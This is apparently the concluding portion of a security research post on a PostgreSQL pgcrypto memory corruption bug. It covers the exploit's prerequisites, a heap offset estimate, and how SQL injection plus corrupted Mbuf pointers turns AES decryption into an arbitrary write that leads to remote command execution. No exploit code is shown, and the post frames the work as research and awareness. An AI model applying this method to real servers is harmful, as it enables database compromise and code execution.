Required: 1. pg_read_server_files role on the PostgreSQL user (this is NOT superuser, it's a lower-privilege role that notably can't use COPY ... PROGRAM) 2. pgcrypto extension loaded (CREATE EXTENSION pgcrypto) 3. Linux with procfs mounted (no hidepid=2) 4. x86-64 architecture 5. Server/proxy must allow requests of that frequency to pass through (if target build is different from the one the exploit targets, it may take up to 3.5k HTTP requests)

Not required:

  • The PGP private key (the attacker generates their own keypair)
  • Direct PostgreSQL access (works entirely through SQL injection)
  • Prior knowledge of the target build (all binary offsets resolved dynamically)

But there is still a build-specific parameter that you won't know without an oracle: the heap offset center estimate (~0x199580 for the SQLi path on this build). This varies with the SQL execution path, compiler flags, and libc version. The ±32KB spiral search covers typical variance within a given configuration.

Commentary on the PoC

This exploit, fragile and fascinating as it is, was written for research purposes, purely to show how memory corruption bugs inside SQL databases can be abused to do things far worse than merely DoSing the server. The goal of this research is to raise awareness in this underestimated corner of software security.

Impact

Unlike most memory corruption bugs in large codebases, this one creates an attack vector exploitable through web applications, particularly because the vulnerable code is directly accessible via SQL queries. This interesting setup allows sophisticated actors to gain remote command execution without leaving the context of a web application. This is not a loud, obvious memory corruption but rather the type of bug you wouldn’t defend against here, because it’s the last vulnerability class anyone expects to find hiding inside an SQL querying mechanism. One would say that this is a typical supply chain case, but this one isn't a typical third‑party library. It lives inside the DBMS where no one thought to look.

Closing thoughts

Today's post reveals an exploitation path that requires special conditions, but the deeper message we want to bear is that web application security is not only about XSS or prototype pollution. Most software forming the bones of frameworks and libraries is brittle, with multiple vectors and surfaces. And a lot of critical attacks come from below, from the lowlands of memory corruption.

Although reliable and full-on exploitation requires additional quirks, corrupting Postgres esoteric structure's (Mbuf) pointers and repurposing the AES-CFB decryption pipeline as an arbitrary write primitive is satisfying in its simplicity. There's no ROP chain, no shellcode, no heap spray. The program's own decryption logic does the writing for us, through a completely normal code path that it was always going to execute. We just change where it reads from and where it writes to.

The engineering effort was mostly about reliability and portability. The dynamic ELF resolution and struct-size-from-disassembly techniques mean the exploit adapts to different pgcrypto builds without precomputed offset tables. The blind heap calibration is the weakest link, it works, but ~3600 HTTP probes is slow and the center estimate is still empirical and will fail if the backend is rather sophisticated. A future improvement would be finding a way to leak the bytea address within a single SQL statement, eliminating the calibration phase entirely.

Attributions

  • Initial vulnerability and CVE was discovered and reported by Team Xint Code during 0day.cloud
  • Images are generated by large language model Claude Sonnet.